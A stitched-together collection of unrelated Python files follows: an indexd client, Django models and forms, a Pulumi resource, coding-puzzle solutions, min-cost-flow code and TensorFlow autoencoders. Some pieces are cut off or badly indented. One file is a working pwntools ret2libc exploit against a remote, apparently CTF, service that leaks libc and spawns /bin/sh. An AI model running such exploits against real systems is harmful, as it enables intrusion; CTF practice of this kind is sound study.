    metadata=None,
    acl=None,
    authz=None,
    urls_metadata=None,
):
    """
    Update an existing entry in the index.

    Args:
        guid (str): record id
        file_name/urls/version/metadata/acl/authz/urls_metadata:
            fields to update; fields left as None are not touched.
            Size and hashes cannot be updated -- create a new version
            for that.

    Returns:
        dict: the updated indexd record
    """
    updatable_attrs = {
        "file_name": file_name,
        "urls": urls,
        "version": version,
        "metadata": metadata,
        "acl": acl,
        "authz": authz,
        "urls_metadata": urls_metadata,
    }
    rec = self.client.get(guid)
    for attr, value in updatable_attrs.items():
        if value is not None:
            # setattr replaces the previous exec(f"rec.{attr} = v"),
            # which needlessly compiled and executed source at runtime.
            setattr(rec, attr, value)
    rec.patch()
    return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_update_record(
    self,
    guid,
    file_name=None,
    urls=None,
    version=None,
    metadata=None,
    acl=None,
    authz=None,
    urls_metadata=None,
    _ssl=None,
    **kwargs,
):
    """
    Asynchronous function to update a record in indexd.

    Args:
        guid (str): record id
        file_name/urls/version/metadata/acl/authz/urls_metadata:
            fields to update; fields left as None are not touched.
            Size and hashes cannot be updated -- create a new version
            for that.
        _ssl (None, optional): whether or not to use ssl

    Returns:
        dict: the updated indexd record
    """
    async with aiohttp.ClientSession() as session:
        updatable_attrs = {
            "file_name": file_name,
            "urls": urls,
            "version": version,
            "metadata": metadata,
            "acl": acl,
            "authz": authz,
            "urls_metadata": urls_metadata,
        }
        record = await self.async_get_record(guid)
        revision = record.get("rev")
        for key, value in updatable_attrs.items():
            if value is not None:
                record[key] = value
        # Strip fields the PUT endpoint does not accept. pop() with a
        # default replaces bare `del`, which raised KeyError whenever a
        # field was absent from the fetched record.
        # NOTE(review): "version" and "urls_metadata" are removed here
        # even when just set above, mirroring the original behaviour --
        # confirm these fields are really not updatable via this PUT.
        for server_managed_field in (
            "created_date",
            "rev",
            "updated_date",
            "version",
            "uploader",
            "form",
            "urls_metadata",
            "baseid",
            "size",
            "hashes",
            "did",
        ):
            record.pop(server_managed_field, None)

        logging.info(f"PUT-ing record: {record}")

        # aiohttp only allows basic auth with their built in auth, so we
        # need to manually add JWT auth header
        headers = {"Authorization": self.client.auth._get_auth_value()}

        async with session.put(
            f"{self.client.url}/index/{guid}?rev={revision}",
            json=record,
            headers=headers,
            ssl=_ssl,
        ) as response:
            assert response.status == 200, await response.json()
            updated = await response.json()
    return updated
### Delete Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def delete_record(self, guid):
    """
    Delete an entry from the index.

    Args:
        guid (str): record id

    Returns:
        the deleted Document (falsy when nothing was found)
    """
    record = self.client.get(guid)
    if record:
        record.delete()
    return record
### Query Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def query_urls(self, pattern):
    """
    Query all record URLs for given pattern

    Args:
        pattern (str): pattern to match against indexd urls

    Returns:
        List[records]: indexd records with urls matching pattern
    """
    # NOTE(review): `pattern` is interpolated into the query string
    # unescaped -- URL-encode it first if it may contain reserved
    # characters.
    response = self.client._get(f"/_query/urls/q?include={pattern}")
    raise_for_status_and_print_error(response)
    return response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_query_urls(self, pattern, _ssl=None):
    """
    Asynchronous function to query urls from indexd.

    Args:
        pattern (str): pattern to match against indexd urls
        _ssl (None, optional): whether or not to use ssl

    Returns:
        List[records]: indexd records with urls matching pattern
    """
    # NOTE(review): `pattern` is interpolated unescaped (see query_urls).
    url = f"{self.client.url}/_query/urls/q?include={pattern}"
    async with aiohttp.ClientSession() as session:
        logging.debug(f"request: {url}")
        async with session.get(url, ssl=_ssl) as response:
            # NOTE(review): raise_for_status_and_print_error is shared
            # with the requests-based code paths -- confirm it handles an
            # aiohttp response object as well.
            raise_for_status_and_print_error(response)
            response = await response.json()
    return response
## Mint GUID Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_valid_guids(self, count=None):
    """
    Get a list of valid GUIDs without indexing.

    Args:
        count (int): number of GUIDs to request

    Returns:
        List[str]: list of valid indexd GUIDs
    """
    suffix = f"?count={count}" if count else ""
    mint_response = self.client._get("/guid/mint" + suffix)
    mint_response.raise_for_status()
    return mint_response.json().get("guids", [])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_guids_prefix(self):
    """Return this instance's GUID prefix, if one is configured."""
    prefix_response = self.client._get("/guid/prefix")
    prefix_response.raise_for_status()
    return prefix_response.json().get("prefix")
def _print_func_name(function):
return "{}.{}".format(function.__module__, function.__name__)
def _print_kwargs(kwargs):
return ", ".join("{}={}".format(k, repr(v)) for k, v in list(kwargs.items()))
|
from pwn import *

# ret2libc exploit for ./ropme (32-bit, Python 2 / pwntools).
# Stage 1: overflow to call puts@plt(puts@got), leaking puts' runtime
# address, then return back into the vulnerable function for stage 2.
puts_plt = 0x080483b0
puts_got = 0x0804a014
vuln = 0x0804850a
# p = process('./ropme')
p = remote("plzpwn.me",6003);
# gdb.attach(p, gdbscript = 'b *vuln+1')
print p.recv()
p.sendline(
'A'*12 +          # padding up to the saved return address
p32(puts_plt) +   # return into puts@plt
p32(vuln+1) +     # puts' own return address: re-enter the vulnerable code
p32(puts_got)     # puts' argument: address of the GOT entry to leak
)
leak = u32(p.recv(4))
print hex(leak)
# p.interactive()
p.recv()
# Stage 2: compute the libc base from the leaked puts address, then
# build a system("/bin/sh") frame for the second overflow.
# libc = ELF('./libc-2.27.so')
libc = ELF('./libc-2.23.so')
libc.address = leak - libc.symbols['_IO_puts']
system = libc.symbols['system']
binsh = libc.search("/bin/sh").next()
print "system() = " + hex(system)
print "binsh() = " + hex(binsh)
p.sendline(
'A'*12+
p32(system)+
p32(0)+       # fake return address for system
p32(binsh)    # system's argument: pointer to "/bin/sh" inside libc
)
p.interactive()
|
from multiprocessing import Process
import time,threading
import os
def tt():
    """Print the identifier of the thread executing this function."""
    print(threading.get_ident())
def run(name):
    """Sleep briefly, greet `name`, then start a thread running tt()."""
    time.sleep(2)
    print('hello %s' % name)
    worker = threading.Thread(target=tt)
    worker.start()
if __name__ == '__main__':
    # Spawn 20 worker processes; each one starts its own thread.
    if True:  # placeholder comment removed -- see loop below
        pass
    for i in range(20):
        p = Process(target=run, args = ("bling %s"%i,))
        p.start()
        # p.join()
'''
Reads the lengths of the two legs of a right triangle and prints its
area. Each number is given on its own line.
'''
b = int(input())  # first leg
h = int(input())  # second leg
s = (b * h) / 2   # area of a right triangle: half the product of the legs
print(s)
# Generated by Django 2.2.1 on 2019-06-04 13:12
from django.db import migrations
class Migration(migrations.Migration):
    """Mark the recomsim model as unmanaged, so Django will no longer
    create or alter its database table."""

    dependencies = [
        ('app', '0010_recomsim'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='recomsim',
            options={'managed': False},
        ),
    ]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
from .. import utilities
class Certificate(pulumi.CustomResource):
    """
    Provides a DigitalOcean Certificate resource that allows you to manage
    certificates for configuring TLS termination in Load Balancers.
    Certificates created with this resource can be referenced in your
    Load Balancer configuration via their ID.
    """
    # NOTE: generated Python 2 code (``basestring`` checks) — regenerate with
    # tfgen rather than editing by hand.
    def __init__(__self__, __name__, __opts__=None, certificate_chain=None, domains=None, leaf_certificate=None, name=None, private_key=None, type=None):
        """Create a Certificate resource with the given unique name, props, and options."""
        if not __name__:
            raise TypeError('Missing resource name argument (for URN creation)')
        if not isinstance(__name__, basestring):
            raise TypeError('Expected resource name to be a string')
        if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        # Properties forwarded to the engine use camelCase keys.
        __props__ = dict()
        if certificate_chain and not isinstance(certificate_chain, basestring):
            raise TypeError('Expected property certificate_chain to be a basestring')
        __self__.certificate_chain = certificate_chain
        """
        The full PEM-formatted trust chain
        between the certificate authority's certificate and your domain's TLS
        certificate.
        """
        __props__['certificateChain'] = certificate_chain
        if domains and not isinstance(domains, list):
            raise TypeError('Expected property domains to be a list')
        __self__.domains = domains
        __props__['domains'] = domains
        if leaf_certificate and not isinstance(leaf_certificate, basestring):
            raise TypeError('Expected property leaf_certificate to be a basestring')
        __self__.leaf_certificate = leaf_certificate
        """
        The contents of a PEM-formatted public
        TLS certificate.
        """
        __props__['leafCertificate'] = leaf_certificate
        if name and not isinstance(name, basestring):
            raise TypeError('Expected property name to be a basestring')
        __self__.name = name
        """
        The name of the certificate for identification.
        """
        __props__['name'] = name
        if private_key and not isinstance(private_key, basestring):
            raise TypeError('Expected property private_key to be a basestring')
        __self__.private_key = private_key
        """
        The contents of a PEM-formatted private-key
        corresponding to the SSL certificate.
        """
        __props__['privateKey'] = private_key
        if type and not isinstance(type, basestring):
            raise TypeError('Expected property type to be a basestring')
        __self__.type = type
        __props__['type'] = type
        # Output-only properties, resolved by the engine after creation.
        __self__.not_after = pulumi.runtime.UNKNOWN
        """
        The expiration date of the certificate
        """
        __self__.sha1_fingerprint = pulumi.runtime.UNKNOWN
        """
        The SHA-1 fingerprint of the certificate
        """
        __self__.state = pulumi.runtime.UNKNOWN
        super(Certificate, __self__).__init__(
            'do:core/certificate:Certificate',
            __name__,
            __props__,
            __opts__)
    def set_outputs(self, outs):
        # Copy engine-resolved output values (camelCase keys) back onto the
        # snake_case instance attributes.
        if 'certificateChain' in outs:
            self.certificate_chain = outs['certificateChain']
        if 'domains' in outs:
            self.domains = outs['domains']
        if 'leafCertificate' in outs:
            self.leaf_certificate = outs['leafCertificate']
        if 'name' in outs:
            self.name = outs['name']
        if 'notAfter' in outs:
            self.not_after = outs['notAfter']
        if 'privateKey' in outs:
            self.private_key = outs['privateKey']
        if 'sha1Fingerprint' in outs:
            self.sha1_fingerprint = outs['sha1Fingerprint']
        if 'state' in outs:
            self.state = outs['state']
        if 'type' in outs:
            self.type = outs['type']
|
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager
from shortuuidfield import ShortUUIDField
from django.db import models
class User(AbstractBaseUser, PermissionsMixin):
    # Short UUID string used as the primary key instead of an auto-increment id.
    uid = ShortUUIDField(primary_key=True)
    name = models.CharField(max_length=20, blank=True, null=True)
    # NOTE(review): a plain CharField here shadows AbstractBaseUser's hashed
    # password field — confirm storing it this way is intentional.
    password = models.CharField(max_length=20, blank=True, null=True)
    age = models.IntegerField(blank=True, null=True)
    gender = models.CharField(max_length=2, blank=True, null=True)
    profile = models.CharField(max_length=255, blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'User'
|
# Problem[2056] : 연월일 순으로 구성된 8자리의 날짜가 입력으로 주어진다. 해당 날짜의 유효성을 판단한 후, 날짜가 유효하다면 ”YYYY/MM/DD”형식으로 출력
# 단, 날짜가 유효하지 않다면 -1을 출력
def isDate(a, b):
    """Return True when month ``a`` and day ``b`` form a valid date.

    Args:
        a: month as a string or number (valid range 1-12).
        b: day of month as a string or number.
    Returns:
        bool: True for a valid month/day pair, False otherwise.

    Leap years are not considered (February is capped at 28 days), matching
    the original problem statement.

    Bug fixed: the original listed November (11) among the 31-day months and
    December (12) among the 30-day months, so 11/31 was accepted and 12/31
    rejected.
    """
    month = int(a)
    day = int(b)
    if month not in range(1, 13):
        return False
    # Days per month, indexed 1-12 (index 0 unused; leap years ignored).
    days_in_month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    return day in range(1, days_in_month[month] + 1)
# Read ``test_cnt`` dates in YYYYMMDD form; print each as "#i YYYY/MM/DD"
# when valid, or "#i -1" when not.
test_cnt = int(input())
results = []
for _ in range(test_cnt):
    raw = input()
    year, month, date = raw[0:4], raw[4:6], raw[6:8]
    if isDate(month, date):
        results.append(year + '/' + month + '/' + date)
    else:
        results.append('-1')
for idx, outcome in enumerate(results, start=1):
    print("#{} {}".format(idx, outcome))
|
import itertools
import logging
import random
import numpy as np
import torch
from cvxopt import matrix, solvers, spmatrix
from ortools.graph import pywrapgraph
from dev_misc import Map
def min_cost_flow(dists, demand, n_similar=None, capacity=1):
    '''
    Modified from https://developers.google.com/optimization/flow/mincostflow.
    ``capacity`` controls how many lost tokens can be mapped to the same known token.
    If it is set to -1, then there is no constraint at all, otherwise use its value.

    dists: 2-D array of pairwise costs, shape (nt, ns); row t = lost token,
        column s = known token. Returns (flow matrix of shape (nt, ns), cost).
    Raises RuntimeError when the solver does not reach OPTIMAL.
    '''
    logging.debug('Solving flow')
    # The solver needs integer costs: scale the float distances by 100.
    dists = (dists * 100.0).astype('int64')
    # The demand cannot exceed the smaller side of the bipartite graph.
    max_demand = min(dists.shape[0], dists.shape[1])
    if demand > max_demand:
        logging.warning('demand too big, set to %d instead' % (max_demand))
        demand = max_demand
    # between each pair. For instance, the arc from node 0 to node 1 has a
    # capacity of 15 and a unit cost of 4.
    nt, ns = dists.shape
    start_nodes = list()
    end_nodes = list()
    unit_costs = list()
    capacities = list()
    # source to c_t
    for t in range(nt):
        start_nodes.append(0)
        end_nodes.append(t + 2)  # NOTE 0 is reserved for source, and 1 for sink
        unit_costs.append(0)
        capacities.append(1)
    # c_s to sink
    for s in range(ns):
        start_nodes.append(s + 2 + nt)
        end_nodes.append(1)
        unit_costs.append(0)
        if capacity == -1:
            capacities.append(nt + ns)  # NOTE Ignore capacity constraint.
        else:
            capacities.append(capacity)
    # c_t to c_s
    if n_similar:  # and False:
        # Prune arcs: keep, for each t, only its n_similar cheapest candidates.
        idx = dists.argpartition(n_similar - 1, axis=1)[:, :n_similar]
        all_words = set()
        for t in range(nt):
            all_s = idx[t]
            all_words.update(all_s)
            # for s in all_s:
            #     start_nodes.append(t + 2)
            #     end_nodes.append(s + 2 + nt)
            #     unit_costs.append(dists[t, s])
        # Ensure at least ``demand`` distinct candidates survive the pruning.
        if len(all_words) < demand:
            logging.warning('pruned too many words, adding some more')
            added = random.sample(set(range(ns)) - all_words, demand - len(all_words))
            all_words.update(added)
            # for s in added:
            #     for t in range(nt):
            #         start_nodes.append(t + 2)
            #         end_nodes.append(s + 2 + nt)
            #         unit_costs.append(dists[t, s])
        for t, s in itertools.product(range(nt), all_words):
            start_nodes.append(t + 2)
            end_nodes.append(s + 2 + nt)
            unit_costs.append(dists[t, s])
            capacities.append(1)
    else:
        # No pruning: fully connect every (t, s) pair.
        for t, s in itertools.product(range(nt), range(ns)):
            start_nodes.append(t + 2)
            end_nodes.append(s + 2 + nt)
            unit_costs.append(dists[t, s])
            capacities.append(1)
    # Define an array of supplies at each node.
    supplies = [demand, -demand]  # + [0] * (nt + ns)
    # Instantiate a SimpleMinCostFlow solver.
    min_cost_flow = pywrapgraph.SimpleMinCostFlow()
    # Add each arc.
    for i in range(0, len(start_nodes)):
        min_cost_flow.AddArcWithCapacityAndUnitCost(
            int(start_nodes[i]),
            int(end_nodes[i]),
            int(capacities[i]),
            int(unit_costs[i]))
    # Add node supplies.
    for i in range(0, len(supplies)):
        min_cost_flow.SetNodeSupply(i, supplies[i])
    # Find the minimum cost flow between node 0 and node 4.
    if min_cost_flow.Solve() == min_cost_flow.OPTIMAL:
        cost = min_cost_flow.OptimalCost()
        flow = np.zeros([nt, ns])
        # Keep only the t->s arcs (skip source/sink arcs) when reading flow.
        for i in range(min_cost_flow.NumArcs()):
            t = min_cost_flow.Tail(i)
            s = min_cost_flow.Head(i)
            if t > 1 and s > 1 + nt:
                flow[t - 2, s - 2 - nt] = min_cost_flow.Flow(i)
        return flow, cost
    else:
        logging.error('There was an issue with the min cost flow input.')
        raise RuntimeError('Min cost flow solver error')
|
import sys

# Redirect stdin so input() reads the test data from a local file.
sys.stdin = open('도약.txt')

N = int(input())
leaf = []
for _ in range(N):
    leaf.append(int(input()))
leaf.sort()
print(leaf)
# NOTE(review): the original file ended with a body-less ``for i in range(N):``
# header — a syntax error; the intended loop body is missing. A no-op body
# keeps the script importable until the algorithm is filled in.
for i in range(N):
    pass  # TODO: implement the per-leaf logic for the "도약" (jump) problem
|
# -*- coding: utf-8 -*-
from itertools import combinations
# Python 2 script (raw_input; filter() returns a list).
# Prints the maximum rank difference and how many pairs achieve it.
n = int(raw_input())
ranks = sorted(map(int, raw_input().split(' ')))
diff = ranks[n - 1] - ranks[0]
# NOTE(review): these three variables are never used afterwards.
has_next_iteration = True
left_pointer = 0
right_pointer = n - 1
if diff != 0:
    # Pairs hitting the max difference: (#max elements) * (#min elements).
    count = len(filter(lambda x: x == ranks[n - 1], ranks)) * len(
        filter(lambda x: x == ranks[0], ranks))
else:
    # All values equal: every unordered pair qualifies.
    count = len(list(combinations(ranks, 2)))
print('{} {}'.format(diff, count))
|
class Solution:
    def isIsomorphic(self, s: str, t: str) -> bool:
        """Two strings are isomorphic when the index pattern of first
        occurrences of their characters matches (e.g. "egg" ~ "add")."""
        # Map each character to the index of its first occurrence; equal
        # index sequences <=> a consistent one-to-one character mapping.
        pattern = lambda text: [text.index(ch) for ch in text]
        return pattern(s) == pattern(t)
from django import forms
from .models import User, Profile
from django.contrib.auth import authenticate
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from django.contrib.auth.models import Group
from crispy_forms.helper import FormHelper
#Form to add user detail for registration
class AddUserForm(forms.ModelForm):
    """New-user registration form; requires password confirmation.

    Labels are hidden (crispy-forms helper); the placeholder texts act as
    the visible prompts. Only ``email`` and ``full_name`` are model fields;
    the two password fields are validated and hashed in save().
    """
    def __init__(self, *args, **kwargs):
        # Hide field labels in the template; placeholders carry the prompts.
        super(AddUserForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_show_labels = False
    full_name = forms.CharField(widget=forms.TextInput(
        attrs={'class': 'form-control','type':'text','name': 'full_name','placeholder':'Full Name'}),
        label='')
    email = forms.EmailField(widget=forms.TextInput(
        attrs={'class': 'form-control','type':'text','name': 'email','placeholder':'Email'}),
        label='')
    password1 = forms.CharField(widget=forms.PasswordInput(
        attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Password'}),
        label='')
    # Typo fix: the placeholder previously read "Comfirm password".
    password2 = forms.CharField(widget=forms.PasswordInput(
        attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Confirm password'}),
        label='')
    # group = forms.ModelChoiceField(queryset=Group.objects.filter(name='Student'), required=True) #getting the groups from admin as a choice field
    class Meta:
        model = User
        fields = ['email', 'full_name']
    def clean_password2(self):
        """Check that the two password entries match."""
        password1 = self.cleaned_data.get("password1")
        password2 = self.cleaned_data.get("password2")
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError("Passwords do not match")
        return password2
    def save(self, commit=True):
        """Persist the user with the password stored in hashed form."""
        user = super().save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
            # user.groups.add(self.cleaned_data['group']) # saving the user to the group as per thie choice.
        return user
# This form is use if the user wants to make changes to the registered detail
class UpdateUserForm(forms.ModelForm):
    """Form for editing an existing user's registered details."""
    email = forms.EmailField()
    class Meta:
        model = User
        fields = ['email', 'full_name']
    # Password can't be changed in the admin
    def clean_password(self):
        # Always return the initial value so edits never touch the password.
        return self.initial["password"]
# this form is use to show the login form to the user
class LoginForm(forms.Form):
    """Login form; validates the credentials against the auth backend."""
    email = forms.EmailField(widget=forms.TextInput(
        attrs={'class': 'form-control','type':'text','name': 'email','placeholder':'Email'}),
        label='')
    password = forms.CharField(widget=forms.PasswordInput(
        attrs={'class':'form-control','type':'password', 'name': 'password','placeholder':'Password'}),
        label='')
    class Meta:
        fields = ['email', 'password']
    def clean(self, *args, **kwargs):
        # Reject the form when the credentials do not authenticate.
        # NOTE(review): the error text says "User does not exist" even for a
        # wrong password — confirm the wording is intentional.
        email = self.cleaned_data.get("email")
        password = self.cleaned_data.get("password")
        if email and password:
            user = authenticate(email=email, password=password)
            if not user:
                raise forms.ValidationError("User does not exist")
        return super(LoginForm, self).clean(*args, **kwargs)
# this form is created for the user to edit their profile
class ProfileForm(forms.ModelForm):
    """Form letting a user edit their own profile fields."""
    class Meta:
        model = Profile
        fields = ['profile_img', 'phone_number', 'address', 'gender', 'about']
from sklearn import cluster
from sklearn.decomposition import PCA
import numpy as np
from infogan.misc.datasets import DataFolder
import matplotlib.pyplot as plt
import tensorflow as tf
import datetime
import os
from launchers.discriminatorTest import trainsetTransform, clusterLabeling
from traditionalClusteringTests.dataUtils import OneHotToInt, showDimRed, \
showResults
def stringNow():
    """Current local time as 'YYYY_MM_DD-HH_MM_SS' (filesystem-safe stamp)."""
    return datetime.datetime.now().strftime('%Y_%m_%d-%H_%M_%S')
class AbstractUnsupModel(object):
    """Base class for unsupervised models whose latent space is evaluated by
    clustering. (Python 2 code: relies on the ``reduce`` builtin and print
    statements.)"""
    def __init__(self,dataset):
        self.dataset=dataset
        self.batchSize =dataset.batch_size
        self.imageShape = dataset.image_shape
        # Number of scalars per image: product of the shape dimensions.
        self.inputSizeFlatten = reduce(lambda x,y : x*y, self.imageShape)
    def train(self):
        raise NotImplementedError()
    def getLatentRepresentation(self,imageBatch):
        raise NotImplementedError()
    def reconstruction(self, imageBatch):
        raise NotImplementedError()
    def evaluate(self,outName,show = 3,nClustersTofind=3):
        """Show a few original/reconstruction pairs, then cluster the latent
        representations (KMeans and spectral) and dump plots under ``outName``."""
        # Squeeze a trailing channel dimension of 1 for grayscale display.
        outImageShape = self.imageShape[:-1] if (len(self.imageShape) == 3 and self.imageShape[2] == 1) else self.imageShape
        images, labeles = self.dataset.next_batch(self.batchSize)
        batchRecons = self.reconstruction(images)
        # Check dataset format (min - max values)
        minDataset = images.min()
        maxDataset = images.max()
        # Check reconstruction format (min - max values)
        minRec = batchRecons.min()
        maxRec = batchRecons.max()
        formatImageDataset = lambda x : x
        formatImageRec = lambda x : x
        # Rescale into [0, 1] only when required so imshow renders correctly.
        if (minDataset < 0 or maxDataset > 1):
            formatImageDataset = lambda image: (image - minDataset) / (maxDataset-minDataset)
            print("Dataset image not in 0-1 range. Range ({0} / {1})".format(minDataset,maxDataset))
        if (minRec < 0 or maxRec > 1):
            formatImageRec = lambda image: (image - minRec) / (maxRec-minRec)
            print("Rec image not in 0-1 range. Range ({0} / {1})".format(minRec,maxRec))
        # Display ``show`` original/reconstruction pairs.
        for i in range(show):
            original = images[i].reshape(outImageShape)
            recon = batchRecons[i].reshape(outImageShape)
            plt.figure('original')
            plt.imshow(formatImageDataset(original))
            plt.figure('Reconstruction')
            plt.imshow(formatImageRec(recon))
            plt.show()
        transformName = outName
        labNames={}
        showBlokeh=True
        # Define the transform as the encoder-output activations.
        transfFun = lambda x: self.getLatentRepresentation(x)
        # Collect the activations over the training set.
        trainX, rlbs = trainsetTransform(transfFun, self.dataset)
        rlbs = OneHotToInt(rlbs)
        # Create the results folder.
        if not os.path.exists(outName):
            os.makedirs(outName)
        # Plot the real labels on a 2-component PCA projection.
        pca = PCA(n_components=2)
        transformed = showDimRed(trainX, rlbs, 'latentRep PCA_Real',
                                 pca, outName)
        kmeans = cluster.KMeans(n_clusters=nClustersTofind)
        spectral = cluster.SpectralClustering(n_clusters=nClustersTofind,
                                              eigen_solver='arpack',
                                              affinity="nearest_neighbors")
        algorithms = [kmeans,spectral]
        for clusterAlg in algorithms:
            # Label the latent points with KMeans / spectral clustering.
            points, predClust, realsLab = clusterLabeling(self.dataset,
                                                          transfFun, clusterAlg,
                                                          trainX)
            name = clusterAlg.__class__.__name__
            print "Showing results for Cluster ", name
            showResults(self.dataset, points, predClust, np.array(realsLab),
                        transformName + " " + 'Cluster ' + str(name), outName,
                        labelNames=labNames)
def checkSessionDecorator(func):
    """Decorator guard: assert the wrapped object has an active TF session
    before invoking the method."""
    def func_wrapper(*args, **kwargs):
        instance = args[0]  # bound method: first positional arg is self
        assert instance.activeSession, 'No active session'
        return func(*args, **kwargs)
    return func_wrapper
class AutoencoderVanilla(AbstractUnsupModel):
    """
    Example of use
    with AutoencoderVanilla() as autoencoder:
        autoencoder.train()
        autoencoder.evaluate()
    The with is needed to start and end the tensorflow session
    """
    def __init__(self, datasetObject, iterations=1000, units=100, learningRate=0.01):
        super(AutoencoderVanilla, self).__init__(datasetObject)
        self.logsDir = 'autoencodersVanilla'  # TensorBoard log subdirectory
        self.iterations = iterations
        self.activeSession = None  # set by __enter__; required by decorated methods
        self.units=units
        self.learningRate=learningRate
    def defArch(self):
        """Build the symmetric fully-connected encoder/decoder graph."""
        self.inputBatch = tf.placeholder(tf.float32, (self.batchSize, self.imageShape[0], self.imageShape[1], self.imageShape[2]), 'input')
        flattenInput = tf.reshape(self.inputBatch, (self.batchSize, self.inputSizeFlatten), name='flattenInput')
        # Encoder: 2*units -> units -> 20-dim bottleneck.
        enc1 = tf.contrib.layers.fully_connected(flattenInput,
                                                 self.units*2,
                                                 activation_fn=tf.nn.relu)
        enc2 = tf.contrib.layers.fully_connected(enc1, self.units, activation_fn=tf.nn.relu)
        self.hiddenLayer = tf.contrib.layers.fully_connected(enc2, 20, activation_fn=tf.nn.relu)
        # Decoder mirrors the encoder; tanh reconstruction output.
        dec1 = tf.contrib.layers.fully_connected(self.hiddenLayer, self.units, activation_fn=tf.nn.relu)
        dec2 = tf.contrib.layers.fully_connected(dec1, self.units*2,activation_fn=tf.nn.relu)
        self.reconstructionLayer = tf.contrib.layers.fully_connected(dec2, self.inputSizeFlatten, activation_fn=tf.nn.tanh)
        self.reconError = tf.losses.mean_squared_error(flattenInput, self.reconstructionLayer)
        self.train_step = tf.train.AdamOptimizer(self.learningRate).minimize(self.reconError)
        tf.summary.scalar('ReconstructionError', self.reconError)
        pass
    @checkSessionDecorator
    def getLatentRepresentation(self,x):
        # Bottleneck activations for a batch of images.
        return self.activeSession.run(self.hiddenLayer, feed_dict={self.inputBatch: x})
    def __enter__(self):
        tf.reset_default_graph()
        # Initialize
        self.defArch()
        self.activeSession = tf.InteractiveSession()
        tf.global_variables_initializer().run()
        self.merged = tf.summary.merge_all()
        modelPath = os.path.join('logs',self.logsDir, stringNow(), 'train')
        self.train_writer = tf.summary.FileWriter(modelPath, self.activeSession.graph)
        self.val_writer = tf.summary.FileWriter(os.path.join('logs',self.logsDir, stringNow(), 'val'), self.activeSession.graph)
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.activeSession.close()
        pass
    @checkSessionDecorator
    def train(self):
        for i in range(self.iterations):
            if i % 30 == 0: # Record summaries and test-set accuracy
                images, labels = self.dataset.next_batch(self.batchSize, 'val')
                summary, error = self.activeSession.run([self.merged, self.reconError], feed_dict={self.inputBatch: images})
                print('Iteration {1} reconstruction Error {0} '.format(error, i))
                self.val_writer.add_summary(summary, i)
            else: # Record train set summaries, and train
                images, labels = self.dataset.next_batch(self.batchSize, 'train')
                summary, _ = self.activeSession.run([self.merged, self.train_step], feed_dict={self.inputBatch: images})
                self.train_writer.add_summary(summary, i)
        self.train_writer.close()
        self.val_writer.close()
    @checkSessionDecorator
    def reconstruction(self, imageBatch):
        # Decoder output (tanh range) for a batch of images.
        return self.activeSession.run(self.reconstructionLayer, feed_dict={self.inputBatch: imageBatch})
class ConvAutoencoder(AutoencoderVanilla):
    """Convolutional variant: conv / conv-transpose stacks replace the dense
    encoder and decoder of AutoencoderVanilla."""
    def __init__(self, datasetObject, iterations=1000, units=32, learningRate=0.01):
        super(ConvAutoencoder, self).__init__(datasetObject,iterations=iterations, units=units, learningRate=learningRate)
        self.logsDir = 'ConvAutoencoder'
    @checkSessionDecorator
    def getLatentRepresentation(self,x):
        # Global average pool over the spatial dims of the hidden feature map.
        return self.activeSession.run(tf.reduce_mean(self.hiddenRep,axis=[1,2]), feed_dict={self.inputBatch: x})
    def defArch(self):
        self.inputBatch = tf.placeholder(tf.float32, (self.batchSize, self.imageShape[0], self.imageShape[1], self.imageShape[2]), 'input')
        # Encoder
        conv1 = tf.layers.conv2d(inputs=self.inputBatch,filters=self.units*2,kernel_size=[3, 3],padding="same",strides=(2,2),
                                 activation=tf.nn.relu,name='Conv1',kernel_initializer=tf.contrib.layers.xavier_initializer())
        conv2 = tf.layers.conv2d(inputs=conv1,filters=self.units,kernel_size=[4, 4],padding="same",strides=(2,2),
                                 activation=tf.nn.relu,name='Conv2',kernel_initializer=tf.contrib.layers.xavier_initializer())
        self.outEncoder = conv2
        # 20-channel hidden representation (stride 1, spatial size preserved).
        self.hiddenRep = tf.layers.conv2d(inputs=self.outEncoder, filters=20, kernel_size=[5, 5], padding="same",strides=(1,1),
                                          activation=tf.nn.relu, name='HidenRep',kernel_initializer=tf.contrib.layers.xavier_initializer())
        # Decoder
        convT1 = tf.layers.conv2d_transpose(self.hiddenRep, self.units, kernel_size=[4, 4], strides=(2, 2), padding='same',
                                            activation=tf.nn.relu, name='convT1',kernel_initializer=tf.contrib.layers.xavier_initializer())
        convT2 = tf.layers.conv2d_transpose(convT1, self.units*2, kernel_size=[3, 3], strides=(2, 2), padding='same',
                                            activation=tf.nn.relu, name='convT2',kernel_initializer=tf.contrib.layers.xavier_initializer())
        outDecoder = convT2
        # Final transpose conv restores the input channel count; tanh output.
        self.reconstructionLayer = tf.layers.conv2d_transpose(outDecoder,self.inputBatch.shape[3],
                                                              kernel_size=[3, 3],strides=(1, 1),padding='same',
                                                              activation=tf.nn.tanh,kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                                              name='Recons')
        self.reconError = tf.losses.mean_squared_error(self.inputBatch, self.reconstructionLayer)
        self.train_step = tf.train.AdamOptimizer(self.learningRate).minimize(self.reconError)
        tf.summary.scalar('ReconstructionError', self.reconError)
        pass
#CONV AE
